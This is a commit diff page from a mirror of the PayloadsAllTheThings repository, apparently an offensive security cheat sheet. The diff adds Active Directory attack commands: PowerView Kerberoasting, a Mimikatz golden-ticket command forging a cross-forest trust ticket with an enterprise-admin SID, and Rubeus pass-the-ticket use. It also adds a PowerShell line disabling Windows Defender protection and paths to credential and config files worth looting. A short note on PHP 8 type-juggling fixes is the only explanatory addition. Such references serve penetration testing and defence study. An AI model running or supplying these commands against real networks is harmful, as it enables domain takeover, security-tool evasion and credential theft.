ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-21 10:48:50 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

AMSI + Trust

Browse Source
This commit is contained in:
Swissky 2020-12-08 14:31:01 +01:00
parent 78cc68674b
commit 19a2950b8d
4 changed files with 752 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
Methodology and Resources/Active Directory Attack.md
View File

@ -1098,6 +1098,12 @@ Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus)
.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt .\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt
``` ```
Alternatively with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
```powershell
Request-SPNTicket -SPN "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
```
Alternatively on macOS machine you can use [bifrost](https://github.com/its-a-feature/bifrost) Alternatively on macOS machine you can use [bifrost](https://github.com/its-a-feature/bifrost)
```powershell ```powershell
@ -1605,6 +1611,9 @@ Prerequisite:
### Forest to Forest Compromise - Trust Ticket ### Forest to Forest Compromise - Trust Ticket
From the DC, dump the hash of the `currentdomain\targetdomain$` trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using
Mimikatz, adding the SID for the target domain's enterprise admins group to our **SID history**.
#### Dumping trust passwords (trust keys) #### Dumping trust passwords (trust keys)
> Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing “$” are computer accounts, but some are trust accounts. > Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing “$” are computer accounts, but some are trust accounts.
@ -1619,12 +1628,14 @@ or find the TRUST_NAME$ machine account hash
```powershell ```powershell
mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi
mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi
``` ```
#### Use the Trust Ticket file to get a TGS for the targeted service #### Use the Trust Ticket file to get a TGS for the targeted service
```powershell ```powershell
./asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local .\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local
.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
``` ```
Inject the TGS file and access the targeted service with the spoofed rights. Inject the TGS file and access the targeted service with the spoofed rights.

735
Methodology and Resources/Windows - AMSI Bypass.md Normal file
View File

File diff suppressed because one or more lines are too long

3
Methodology and Resources/Windows - Privilege Escalation.md
View File

@ -249,6 +249,7 @@ PS C:\> Get-MpComputerStatus
# disable Real Time Monitoring # disable Real Time Monitoring
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> Set-MpPreference -DisableIOAVProtection $true
``` ```
### AppLocker Enumeration ### AppLocker Enumeration
@ -426,6 +427,8 @@ C:\inetpub\wwwroot\web.config
%USERPROFILE%\ntuser.dat %USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts %WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*
dir c:*vnc.ini /s /b dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b dir c:*ultravnc.ini /s /b
``` ```

2
Type Juggling/README.md
View File

@ -7,6 +7,8 @@ PHP provides two ways to compare two variables:
PHP type juggling vulnerabilities arise when loose comparison (== or !=) is employed instead of strict comparison (=== or !==) in an area where the attacker can control one of the variables being compared. This vulnerability can result in the application returning an unintended answer to the true or false statement, and can lead to severe authorization and/or authentication bugs. PHP type juggling vulnerabilities arise when loose comparison (== or !=) is employed instead of strict comparison (=== or !==) in an area where the attacker can control one of the variables being compared. This vulnerability can result in the application returning an unintended answer to the true or false statement, and can lead to severe authorization and/or authentication bugs.
> PHP8 won't try to cast string into numbers anymore, thanks to the Saner string to number comparisons RFC, meaning that collision with hashes starting with 0e and the likes are finally a thing of the past! The Consistent type errors for internal functions RFC will prevent things like `0 == strcmp($_GET['username'], $password)` bypasses, since strcmp won't return null and spit a warning any longer, but will throw a proper exception instead.
## Type Juggling ## Type Juggling
### True statements ### True statements